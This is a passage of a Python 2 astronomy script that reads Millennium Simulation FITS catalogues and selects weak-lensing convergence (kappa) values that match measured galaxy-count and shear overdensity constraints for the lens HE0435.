weightsfile[measured_index_inf45][0]\nconstrwidth_gal_meds_sup45 = weightsfile[measured_index_sup45][0]\n\nconstr_z_meds45 = weightsfile[measured_index45][1]\nconstrwidth_z_meds_inf45 = weightsfile[measured_index_inf45][1]\nconstrwidth_z_meds_sup45 = weightsfile[measured_index_sup45][1]\n\nconstr_mass_meds45 = weightsfile[measured_index45][2]\nconstrwidth_mass_meds_inf45 = weightsfile[measured_index_inf45][2]\nconstrwidth_mass_meds_sup45 = weightsfile[measured_index_sup45][2]\n\nconstr_mass2_meds45 = weightsfile[measured_index45][3]\nconstrwidth_mass2_meds_inf45 = weightsfile[measured_index_inf45][3]\nconstrwidth_mass2_meds_sup45 = weightsfile[measured_index_sup45][3]\n\nconstr_mass3_meds45 = weightsfile[measured_index45][4]\nconstrwidth_mass3_meds_inf45 = weightsfile[measured_index_inf45][4]\nconstrwidth_mass3_meds_sup45 = weightsfile[measured_index_sup45][4]\n\nconstr_oneoverr_meds45 = weightsfile[measured_index45][5]\nconstrwidth_oneoverr_meds_inf45 = weightsfile[measured_index_inf45][5]\nconstrwidth_oneoverr_meds_sup45 = weightsfile[measured_index_sup45][5]\n\nconstr_zoverr_meds45 = weightsfile[measured_index45][6]\nconstrwidth_zoverr_meds_inf45 = weightsfile[measured_index_inf45][6]\nconstrwidth_zoverr_meds_sup45 = weightsfile[measured_index_sup45][6]\n\nconstr_massoverr_meds45 = weightsfile[measured_index45][7]\nconstrwidth_massoverr_meds_inf45 = weightsfile[measured_index_inf45][7]\nconstrwidth_massoverr_meds_sup45 = weightsfile[measured_index_sup45][7]\n\nconstr_mass2overr_meds45 = weightsfile[measured_index45][8]\nconstrwidth_mass2overr_meds_inf45 = weightsfile[measured_index_inf45][8]\nconstrwidth_mass2overr_meds_sup45 = weightsfile[measured_index_sup45][8]\n\nconstr_mass3overr_meds45 = weightsfile[measured_index45][9]\nconstrwidth_mass3overr_meds_inf45 = weightsfile[measured_index_inf45][9]\nconstrwidth_mass3overr_meds_sup45 = weightsfile[measured_index_sup45][9]\n\nconstr_mass2rms_meds45 = weightsfile[measured_index45][10]\nconstrwidth_mass2rms_meds_inf45 = weightsfile[measured_index_inf45][10]\nconstrwidth_mass2rms_meds_sup45 = weightsfile[measured_index_sup45][10]\n\nconstr_mass3rms_meds45 = weightsfile[measured_index45][11]\nconstrwidth_mass3rms_meds_inf45 = weightsfile[measured_index_inf45][11]\nconstrwidth_mass3rms_meds_sup45 = weightsfile[measured_index_sup45][11]\n\nconstr_mass2overrrms_meds45 = weightsfile[measured_index45][12]\nconstrwidth_mass2overrrms_meds_inf45 = weightsfile[measured_index_inf45][12]\nconstrwidth_mass2overrrms_meds_sup45 = weightsfile[measured_index_sup45][12]\n\nconstr_mass3overrrms_meds45 = weightsfile[measured_index45][13]\nconstrwidth_mass3overrrms_meds_inf45 = weightsfile[measured_index_inf45][13]\nconstrwidth_mass3overrrms_meds_sup45 = weightsfile[measured_index_sup45][13]\n\nconstr_flexion_meds45 = weightsfile[measured_index45][14]\nconstrwidth_flexion_meds_inf45 = weightsfile[measured_index_inf45][14]\nconstrwidth_flexion_meds_sup45 = weightsfile[measured_index_sup45][14]\n\nconstr_tidal_meds45 = weightsfile[measured_index45][15]\nconstrwidth_tidal_meds_inf45 = weightsfile[measured_index_inf45][15]\nconstrwidth_tidal_meds_sup45 = weightsfile[measured_index_sup45][15]\n\nconstr_SIS_meds45 = weightsfile[measured_index45][16]\nconstrwidth_SIS_meds_inf45 = weightsfile[measured_index_inf45][16]\nconstrwidth_SIS_meds_sup45 = weightsfile[measured_index_sup45][16]\n\nconstr_SIShalo_meds45 = weightsfile[measured_index45][17]\nconstrwidth_SIShalo_meds_inf45 = weightsfile[measured_index_inf45][17]\nconstrwidth_SIShalo_meds_sup45 = weightsfile[measured_index_sup45][17]\n\nif innermask == \"5\":\n constr_gal_meds120 = weightsfile[measured_index120][0]\n constrwidth_gal_meds_inf120 = weightsfile[measured_index_inf120][0]\n constrwidth_gal_meds_sup120 = weightsfile[measured_index_sup120][0]\n\n constr_z_meds120 = weightsfile[measured_index120][1]\n constrwidth_z_meds_inf120 = weightsfile[measured_index_inf120][1]\n constrwidth_z_meds_sup120 = weightsfile[measured_index_sup120][1]\n\n constr_mass_meds120 = weightsfile[measured_index120][2]\n constrwidth_mass_meds_inf120 = weightsfile[measured_index_inf120][2]\n constrwidth_mass_meds_sup120 = weightsfile[measured_index_sup120][2]\n\n constr_mass2_meds120 = weightsfile[measured_index120][3]\n constrwidth_mass2_meds_inf120 = weightsfile[measured_index_inf120][3]\n constrwidth_mass2_meds_sup120 = weightsfile[measured_index_sup120][3]\n\n constr_mass3_meds120 = weightsfile[measured_index120][4]\n constrwidth_mass3_meds_inf120 = weightsfile[measured_index_inf120][4]\n constrwidth_mass3_meds_sup120 = weightsfile[measured_index_sup120][4]\n\n constr_oneoverr_meds120 = weightsfile[measured_index120][5]\n constrwidth_oneoverr_meds_inf120 = weightsfile[measured_index_inf120][5]\n constrwidth_oneoverr_meds_sup120 = weightsfile[measured_index_sup120][5]\n\n constr_zoverr_meds120 = weightsfile[measured_index120][6]\n constrwidth_zoverr_meds_inf120 = weightsfile[measured_index_inf120][6]\n constrwidth_zoverr_meds_sup120 = weightsfile[measured_index_sup120][6]\n\n constr_massoverr_meds120 = weightsfile[measured_index120][7]\n constrwidth_massoverr_meds_inf120 = weightsfile[measured_index_inf120][7]\n constrwidth_massoverr_meds_sup120 = weightsfile[measured_index_sup120][7]\n\n constr_mass2overr_meds120 = weightsfile[measured_index120][8]\n constrwidth_mass2overr_meds_inf120 = weightsfile[measured_index_inf120][8]\n constrwidth_mass2overr_meds_sup120 = weightsfile[measured_index_sup120][8]\n\n constr_mass3overr_meds120 = weightsfile[measured_index120][9]\n constrwidth_mass3overr_meds_inf120 = weightsfile[measured_index_inf120][9]\n constrwidth_mass3overr_meds_sup120 = weightsfile[measured_index_sup120][9]\n\n constr_mass2rms_meds120 = weightsfile[measured_index120][10]\n constrwidth_mass2rms_meds_inf120 = weightsfile[measured_index_inf120][10]\n constrwidth_mass2rms_meds_sup120 = weightsfile[measured_index_sup120][10]\n\n constr_mass3rms_meds120 = weightsfile[measured_index120][11]\n constrwidth_mass3rms_meds_inf120 = weightsfile[measured_index_inf120][11]\n constrwidth_mass3rms_meds_sup120 = weightsfile[measured_index_sup120][11]\n\n constr_mass2overrrms_meds120 = weightsfile[measured_index120][12]\n constrwidth_mass2overrrms_meds_inf120 = weightsfile[measured_index_inf120][12]\n constrwidth_mass2overrrms_meds_sup120 = weightsfile[measured_index_sup120][12]\n\n constr_mass3overrrms_meds120 = weightsfile[measured_index120][13]\n constrwidth_mass3overrrms_meds_inf120 = weightsfile[measured_index_inf120][13]\n constrwidth_mass3overrrms_meds_sup120 = weightsfile[measured_index_sup120][13]\n\n constr_flexion_meds120 = weightsfile[measured_index120][14]\n constrwidth_flexion_meds_inf120 = weightsfile[measured_index_inf120][14]\n constrwidth_flexion_meds_sup120 = weightsfile[measured_index_sup120][14]\n\n constr_tidal_meds120 = weightsfile[measured_index120][15]\n constrwidth_tidal_meds_inf120 = weightsfile[measured_index_inf120][15]\n constrwidth_tidal_meds_sup120 = weightsfile[measured_index_sup120][15]\n\n constr_SIS_meds120 = weightsfile[measured_index120][16]\n constrwidth_SIS_meds_inf120 = weightsfile[measured_index_inf120][16]\n constrwidth_SIS_meds_sup120 = weightsfile[measured_index_sup120][16]\n\n constr_SIShalo_meds120 = weightsfile[measured_index120][17]\n constrwidth_SIShalo_meds_inf120 = weightsfile[measured_index_inf120][17]\n constrwidth_SIShalo_meds_sup120 = weightsfile[measured_index_sup120][17]\n\ndef declareweight(weightin):\n if weightin.split('_')[0] == \"45\":\n if weightin.split('_')[1] == \"gal\": constr_weight = constr_gal_meds45; constrwidth_weight_inf = constrwidth_gal_meds_inf45; constrwidth_weight_sup = constrwidth_gal_meds_sup45\n if weightin.split('_')[1] == \"z\": constr_weight = constr_z_meds45; constrwidth_weight_inf = constrwidth_z_meds_inf45; constrwidth_weight_sup = constrwidth_z_meds_sup45\n if weightin.split('_')[1] == \"mass\": constr_weight = constr_mass_meds45; constrwidth_weight_inf = constrwidth_mass_meds_inf45; constrwidth_weight_sup = constrwidth_mass_meds_sup45\n if weightin.split('_')[1] == \"mass2\": constr_weight = constr_mass2_meds45; constrwidth_weight_inf = constrwidth_mass2_meds_inf45; constrwidth_weight_sup = constrwidth_mass2_meds_sup45\n if weightin.split('_')[1] == \"mass3\": constr_weight = constr_mass3_meds45; constrwidth_weight_inf = constrwidth_mass3_meds_inf45; constrwidth_weight_sup = constrwidth_mass3_meds_sup45\n if weightin.split('_')[1] == \"oneoverr\": constr_weight = constr_oneoverr_meds45; constrwidth_weight_inf = constrwidth_oneoverr_meds_inf45; constrwidth_weight_sup = constrwidth_oneoverr_meds_sup45\n if weightin.split('_')[1] == \"zoverr\": constr_weight = constr_zoverr_meds45; constrwidth_weight_inf = constrwidth_zoverr_meds_inf45; constrwidth_weight_sup = constrwidth_zoverr_meds_sup45\n if weightin.split('_')[1] == \"massoverr\": constr_weight = constr_massoverr_meds45; constrwidth_weight_inf = constrwidth_massoverr_meds_inf45; constrwidth_weight_sup = constrwidth_massoverr_meds_sup45\n if weightin.split('_')[1] == \"mass2overr\": constr_weight = constr_mass2overr_meds45; constrwidth_weight_inf = constrwidth_mass2overr_meds_inf45; constrwidth_weight_sup = constrwidth_mass2overr_meds_sup45\n if weightin.split('_')[1] == \"mass3overr\": constr_weight = constr_mass3overr_meds45; constrwidth_weight_inf = constrwidth_mass3overr_meds_inf45; constrwidth_weight_sup = constrwidth_mass3overr_meds_sup45\n if weightin.split('_')[1] == \"mass2rms\": constr_weight = constr_mass2rms_meds45; constrwidth_weight_inf = constrwidth_mass2rms_meds_inf45; constrwidth_weight_sup = constrwidth_mass2rms_meds_sup45\n if weightin.split('_')[1] == \"mass3rms\": constr_weight = constr_mass3rms_meds45; constrwidth_weight_inf = constrwidth_mass3rms_meds_inf45; constrwidth_weight_sup = constrwidth_mass3rms_meds_sup45\n if weightin.split('_')[1] == \"mass2overrrms\": constr_weight = constr_mass2overrrms_meds45; constrwidth_weight_inf = constrwidth_mass2overrrms_meds_inf45; constrwidth_weight_sup = constrwidth_mass2overrrms_meds_sup45\n if weightin.split('_')[1] == \"mass3overrrms\": constr_weight = constr_mass3overrrms_meds45; constrwidth_weight_inf = constrwidth_mass3overrrms_meds_inf45; constrwidth_weight_sup = constrwidth_mass3overrrms_meds_sup45\n if weightin.split('_')[1] == \"flexion\": constr_weight = constr_flexion_meds45; constrwidth_weight_inf = constrwidth_flexion_meds_inf45; constrwidth_weight_sup = constrwidth_flexion_meds_sup45\n if weightin.split('_')[1] == \"tidal\": constr_weight = constr_tidal_meds45; constrwidth_weight_inf = constrwidth_tidal_meds_inf45; constrwidth_weight_sup = constrwidth_tidal_meds_sup45\n if weightin.split('_')[1] == \"SIS\": constr_weight = constr_SIS_meds45; constrwidth_weight_inf = constrwidth_SIS_meds_inf45; constrwidth_weight_sup = constrwidth_SIS_meds_sup45\n if weightin.split('_')[1] == \"SIShalo\": constr_weight = constr_SIShalo_meds45; constrwidth_weight_inf = constrwidth_SIShalo_meds_inf45; constrwidth_weight_sup = constrwidth_SIShalo_meds_sup45\n if weightin.split('_')[0] == \"120\":\n if weightin.split('_')[1] == \"gal\": constr_weight = constr_gal_meds120; constrwidth_weight_inf = constrwidth_gal_meds_inf120; constrwidth_weight_sup = constrwidth_gal_meds_sup120\n if weightin.split('_')[1] == \"z\": constr_weight = constr_z_meds120; constrwidth_weight_inf = constrwidth_z_meds_inf120; constrwidth_weight_sup = constrwidth_z_meds_sup120\n if weightin.split('_')[1] == \"mass\": constr_weight = constr_mass_meds120; constrwidth_weight_inf = constrwidth_mass_meds_inf120; constrwidth_weight_sup = constrwidth_mass_meds_sup120\n if weightin.split('_')[1] == \"mass2\": constr_weight = constr_mass2_meds120; constrwidth_weight_inf = constrwidth_mass2_meds_inf120; constrwidth_weight_sup = constrwidth_mass2_meds_sup120\n if weightin.split('_')[1] == \"mass3\": constr_weight = constr_mass3_meds120; constrwidth_weight_inf = constrwidth_mass3_meds_inf120; constrwidth_weight_sup = constrwidth_mass3_meds_sup120\n if weightin.split('_')[1] == \"oneoverr\": constr_weight = constr_oneoverr_meds120; constrwidth_weight_inf = constrwidth_oneoverr_meds_inf120; constrwidth_weight_sup = constrwidth_oneoverr_meds_sup120\n if weightin.split('_')[1] == \"zoverr\": constr_weight = constr_zoverr_meds120; constrwidth_weight_inf = constrwidth_zoverr_meds_inf120; constrwidth_weight_sup = constrwidth_zoverr_meds_sup120\n if weightin.split('_')[1] == \"massoverr\": constr_weight = constr_massoverr_meds120; constrwidth_weight_inf = constrwidth_massoverr_meds_inf120; constrwidth_weight_sup = constrwidth_massoverr_meds_sup120\n if weightin.split('_')[1] == \"mass2overr\": constr_weight = constr_mass2overr_meds120; constrwidth_weight_inf = constrwidth_mass2overr_meds_inf120; constrwidth_weight_sup = constrwidth_mass2overr_meds_sup120\n if weightin.split('_')[1] == \"mass3overr\": constr_weight = constr_mass3overr_meds120; constrwidth_weight_inf = constrwidth_mass3overr_meds_inf120; constrwidth_weight_sup = constrwidth_mass3overr_meds_sup120\n if weightin.split('_')[1] == \"mass2rms\": constr_weight = constr_mass2rms_meds120; constrwidth_weight_inf = constrwidth_mass2rms_meds_inf120; constrwidth_weight_sup = constrwidth_mass2rms_meds_sup120\n if weightin.split('_')[1] == \"mass3rms\": constr_weight = constr_mass3rms_meds120; constrwidth_weight_inf = constrwidth_mass3rms_meds_inf120; constrwidth_weight_sup = constrwidth_mass3rms_meds_sup120\n if weightin.split('_')[1] == \"mass2overrrms\": constr_weight = constr_mass2overrrms_meds120; constrwidth_weight_inf = constrwidth_mass2overrrms_meds_inf120; constrwidth_weight_sup = constrwidth_mass2overrrms_meds_sup120\n if weightin.split('_')[1] == \"mass3overrrms\": constr_weight = constr_mass3overrrms_meds120; constrwidth_weight_inf = constrwidth_mass3overrrms_meds_inf120; constrwidth_weight_sup = constrwidth_mass3overrrms_meds_sup120\n if weightin.split('_')[1] == \"flexion\": constr_weight = constr_flexion_meds120; constrwidth_weight_inf = constrwidth_flexion_meds_inf120; constrwidth_weight_sup = constrwidth_flexion_meds_sup120\n if weightin.split('_')[1] == \"tidal\": constr_weight = constr_tidal_meds120; constrwidth_weight_inf = constrwidth_tidal_meds_inf120; constrwidth_weight_sup = constrwidth_tidal_meds_sup120\n if weightin.split('_')[1] == \"SIS\": constr_weight = constr_SIS_meds120; constrwidth_weight_inf = constrwidth_SIS_meds_inf120; constrwidth_weight_sup = constrwidth_SIS_meds_sup120\n if weightin.split('_')[1] == \"SIShalo\": constr_weight = constr_SIShalo_meds120; constrwidth_weight_inf = constrwidth_SIShalo_meds_inf120; constrwidth_weight_sup = constrwidth_SIShalo_meds_sup120\n if weightin.split('_')[1] == \"gamma\": constr_weight = constr_gamma; constrwidth_weight_inf = constrwidth_gamma_inf; constrwidth_weight_sup = constrwidth_gamma_sup\n return constr_weight, constrwidth_weight_inf, constrwidth_weight_sup\n\nif conjoined == 3: constr_weight3, constrwidth_weight3_inf, constrwidth_weight3_sup = declareweight(weightin3)\nif (conjoined == 2) | (conjoined == 3): constr_weight2, constrwidth_weight2_inf, constrwidth_weight2_sup = declareweight(weightin2)\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3): constr_weight1, constrwidth_weight1_inf, constrwidth_weight1_sup = declareweight(weightin1)\n\nprint \"Reading...\"\n\nif conjoined == 3:\n output = '%skappahist_HE0435_%sinnermask_nobeta%s_%s_%s_%s_%s_%s_increments%s%s%s.cat' % (rootout,innermask,handpickedstr,other,weightin1,weightin2,weightin3,mag,increment1,increment2,increment3)\nif conjoined == 1:\n output = '%skappahist_HE0435_%sinnermask_nobeta%s_%s_%s_%s_increments%s_unbias%s_gamma%s.cat' % (rootout,innermask,handpickedstr,other,weightin1,mag,increment1,unbias,constr_gamma)\n\ndef readfile(file,usecols):\n f = fitsio.FITS(file)\n print f # I need to print it, or f.hdu_list will not read\n ext = len(f.hdu_list)\n for i in range(ext - 1):\n if i == 0:\n data = fitsio.read(file, columns=usecols, ext=i+1)\n else:\n data = np.r_[data,fitsio.read(file, columns=usecols, ext=i+1)]\n # for speed, fitsio always returns columns and rows in order, so for instance in [1,2,3] even when usecols=[2,3,1]\n sort = np.argsort(np.argsort(usecols))\n if len(usecols) == 1:\n return data[data.dtype.names[0]]\n if len(usecols) == 2:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]]\n if len(usecols) == 3:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]]\n if len(usecols) == 4:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]]\n if len(usecols) == 5:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]],data[data.dtype.names[sort[4]]]\n if len(usecols) == 6:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]],data[data.dtype.names[sort[4]]],data[data.dtype.names[sort[5]]]\n if len(usecols) == 7:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]],data[data.dtype.names[sort[4]]],data[data.dtype.names[sort[5]]],data[data.dtype.names[sort[6]]]\n if len(usecols) == 8:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]],data[data.dtype.names[sort[4]]],data[data.dtype.names[sort[5]]],data[data.dtype.names[sort[6]]],data[data.dtype.names[sort[7]]]\n\ndef readconjoined1_ugriz(radius,weight1_index,constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup):\n ''' Here I only read the columns of interest, without kappa, for ugriz, in order to find the medians of their values over the whole MS.'''\n if only8 == True: field = 1\n else: field = 8\n med1 = np.zeros(field)\n filters1 = \"ugriz\"\n for j in range(field):\n for i in range(8):\n if type(weight1_index) == int:\n weight1_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=[weight1_index])\n if i == 0:\n weight1 = weight1_\n else:\n weight1 = np.append(weight1,weight1_)\n else:\n weight1_1_,weight1_2_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=[2,3])\n if i == 0:\n weight1_1 = weight1_1_\n weight1_2 = weight1_2_\n else:\n weight1_1 = np.append(weight1_1,weight1_1_)\n weight1_2 = np.append(weight1_2,weight1_2_)\n #print j,i\n if type(weight1_index) == int:\n med1[j] = np.median(weight1)\n else:\n med1[j] = np.median(np.sqrt(weight1_1**2 + weight1_2**2))\n med_weight1 = np.mean(med1) # throughout the code I use med_weight1 when computing intervals, following Green et al. For this, weight1 should always refer to simple galaxy number counts\n if type(weight1_index) != int:\n constr_weight1 = constr_weight1 / med_weight1 # for gamma, measured shear divided by the median value of shear in MS; this turns it into an overdensity, like the other weights, so that it is meaningful to multiply later by the median number of galaxies\n constrwidth_weight1_inf = constrwidth_weight1_inf / med_weight1\n constrwidth_weight1_sup = constrwidth_weight1_sup / med_weight1\n E_w1_inf = np.max([1, round(35 * (constr_weight1 - constrwidth_weight1_inf))]) # absolute number, e.g. of galaxies within the lower width; med_weight1=35 for N_gal\n E_w1_sup = np.max([1, round(35 * (-constr_weight1 + constrwidth_weight1_sup))])\n return constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup,med_weight1,E_w1_inf,E_w1_sup\n\ndef readconjoined3_ugriz(radius,weight1_index,weight2_index,weight3_index,constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup,constr_weight2,constrwidth_weight2_inf,constrwidth_weight2_sup,constr_weight3,constrwidth_weight3_inf,constrwidth_weight3_sup):\n if only8 == True: field = 1\n else: field = 8\n med1 = np.zeros(field)\n med2 = np.zeros(field)\n med3 = np.zeros(field)\n filters1 = \"ugriz\"\n for j in range(field):\n for i in range(8):\n if type(weight2_index) == int:\n weight1_,weight2_,weight3_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=(weight1_index,weight2_index,weight3_index))\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n else:\n weight1_,weight2_1_,weight2_2_,weight3_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=(weight1_index,2,3,weight3_index))\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n weight3 = np.append(weight3,weight3_)\n #print j,i\n if type(weight2_index) == int:\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n med3[j] = np.median(weight3)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med3[j] = np.median(weight3)\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n med_weight3 = np.mean(med3)\n if type(weight2_index) != int:\n constr_weight2 = constr_weight2 / med_weight2\n constrwidth_weight2_inf = constrwidth_weight2_inf / med_weight2\n constrwidth_weight2_sup = constrwidth_weight2_sup / med_weight2\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n E_w3_inf = np.max([1, round(med_weight1 * (constr_weight3 - constrwidth_weight3_inf))])\n E_w3_sup = np.max([1, round(med_weight1 * (-constr_weight3 + constrwidth_weight3_sup))])\n return constr_weight2,constrwidth_weight2_inf,constrwidth_weight2_sup,med_weight1,med_weight2,med_weight3,E_w1_inf,E_w1_sup,E_w2_inf,E_w2_sup,E_w3_inf,E_w3_sup\n\ndef readconjoined1_ugrizJHK(radius,weight1_index,constr_weight1,increment1,med_weight1,E_w1_inf,E_w1_sup):\n ''' Here I read ugrizJHK, converting weighted counts into overdensities, and recording the kappa values only for overdensities satisfying the constraint. I consider the full range of the constraint.'''\n filters1 = filters\n if only8 == True: field = 1\n else: field = 8\n for j in range(field):\n for i in range(8):\n if type(weight1_index) == int:\n id_,kappa_, weight1_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=(0,1,weight1_index))\n weight1_ = weight1_ / med_weight1\n else:\n id_,kappa_, gamma1_,gamma2_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=(0,1,2,3))\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = gamma / med_weight1\n weight = np.copy(weight1_)\n print np.shape(kappa_)\n id_ = id_[(weight * 35 >= round(constr_weight1 * 35) - limsigma * E_w1_inf - increment1/2.0) & (weight * 35 < round(constr_weight1 * 35) + limsigma * E_w1_sup + increment1/2.0) ]\n kappa_ = kappa_[(weight * 35 >= round(constr_weight1 * 35) - limsigma * E_w1_inf - increment1/2.0) & (weight * 35 < round(constr_weight1 * 35) + limsigma * E_w1_sup + increment1/2.0) ] # convert overdensities into absolute counts\n weight1_ = weight1_[(weight * 35 >= round(constr_weight1 * 35) - limsigma * E_w1_inf - increment1/2.0) & (weight * 35 < round(constr_weight1 * 35) + limsigma * E_w1_sup + increment1/2.0) ]\n print np.shape(kappa_)\n del weight\n if (i == 0) and (j == 0):\n id = id_\n kappa = kappa_\n weight1 = weight1_\n ind1 = np.ones(np.shape(id_)) * j # this is to record the field name, and will be used together with id when matching different apertures\n ind2 = np.ones(np.shape(id_)) * i\n else:\n id = np.append(id,id_)\n ind1 = np.append(ind1,np.ones(np.shape(id_)) * j)\n ind2 = np.append(ind2,np.ones(np.shape(id_)) * i)\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n #print j,i\n return id,ind1,ind2,kappa,weight1\n\ndef readconjoined3_ugrizJHK(radius,weight1_index,weight2_index,weight3_index,constr_weight1,constr_weight2,constr_weight3,increment1,increment2,increment3,med_weight1,med_weight2,med_weight3,E_w1_inf,E_w1_sup,E_w2_inf,E_w2_sup,E_w3_inf,E_w3_sup):\n filters1 = filters\n if only8 == True: field = 1\n else: field = 8\n for j in range(field):\n for i in range(8):\n if type(weight2_index) == int:\n id_,kappa_, weight1_,weight2_,weight3_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=(0,1,weight1_index,weight2_index,weight3_index))\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n weight3_ = weight3_ / med_weight3\n else:\n id_,kappa_, weight1_,weight3_,gamma1_,gamma2_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=(0,1,weight1_index,weight3_index,2,3))\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight3_ = weight3_ / med_weight3\n weight = np.copy(weight1_)\n print np.shape(kappa_)\n id_ = id_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n print np.shape(kappa_)\n del weight\n weight = np.copy(weight2_)\n id_ = id_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n print np.shape(kappa_)\n del weight\n weight = np.copy(weight3_)\n id_ = id_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + 